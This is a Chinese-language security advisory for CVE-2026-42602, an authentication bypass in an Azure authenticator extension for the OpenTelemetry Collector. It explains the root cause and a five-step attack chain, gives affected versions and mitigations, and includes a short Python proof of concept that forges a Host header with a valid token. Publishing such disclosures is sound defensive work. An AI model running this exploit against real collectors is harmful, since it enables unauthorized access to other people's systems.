IPBUF安全漏洞报告
English
CVE-2026-42602 CVSS 8.1 高危

CVE-2026-42602 Azure认证扩展服务端认证绕过漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42602
漏洞类型
认证绕过
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Azure Authenticator Extension

相关标签

认证绕过OpenTelemetryAzure逻辑漏洞CVE-2026-42602

漏洞概述

Azure Authenticator Extension(OpenTelemetry组件)在0.124.0至0.150.0版本中存在服务器端认证绕过漏洞。由于该扩展未正确验证传入的Bearer Token,攻击者只需持有收集器配置身份可访问的任意Azure资源的有效令牌,并通过构造特定的Host头,即可绕过认证访问任何使用该扩展的OpenTelemetry接收器。该漏洞可能导致系统完整性和可用性受损。

技术细节

漏洞的根本原因在于扩展的Authenticate方法存在逻辑缺陷。该方法没有对客户端提供的JWT进行签名验证,而是将客户端请求中的Host头作为scope参数,利用服务端自身的身份凭证向Azure申请新的Token。随后,服务端直接将客户端提交的Token与服务器端获取的Token进行字符串比对。由于攻击者可以伪造Host头,只要攻击者持有一个与目标服务主体权限范围内的任何资源相关的有效令牌,即可诱导服务端生成相同的Token,从而通过字符串匹配验证,实现未经授权的访问。

攻击链分析

STEP 1
信息收集
识别使用Azure Authenticator Extension的OpenTelemetry Collector目标。
STEP 2
获取令牌
攻击者获取一个有效的Azure访问令牌,该令牌针对目标服务主体有权访问的任何资源(如ARM、Storage等)。
STEP 3
构造攻击请求
攻击者向Collector发送请求,在Host头中设置与令牌资源匹配的主机名,并在Authorization头中提供获取的令牌。
STEP 4
触发逻辑漏洞
服务端根据Host头获取令牌并与客户端令牌进行字符串比对,由于一致,认证通过。
STEP 5
未授权访问
攻击者成功绕过认证,向OpenTelemetry接收器发送恶意数据或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_url = "http://<collector-host>:4318/v1/logs" # A valid Azure access token for any resource the collector's identity can access valid_token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1Ni..." # The Host header must match the resource audience of the token malicious_host = "<resource-name>.azurewebsites.net" headers = { "Authorization": f"Bearer {valid_token}", "Host": malicious_host, "Content-Type": "application/json" } payload = '{"resourceLogs": []}' try: response = requests.post(target_url, headers=headers, data=payload, verify=False) if response.status_code == 200 or response.status_code == 202: print("[+] Exploit successful: Authentication bypassed.") else: print(f"[-] Exploit failed: Status code {response.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

azureauthextension 0.124.0 - 0.150.0

防御指南

临时缓解措施
建议立即将受影响的OpenTelemetry Collector组件升级到修复版本。如果无法立即升级,应通过网络ACL限制对Collector端口的访问,确保只有受信任的内部服务可以连接,并审查服务主体的权限,确保其遵循最小权限原则。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表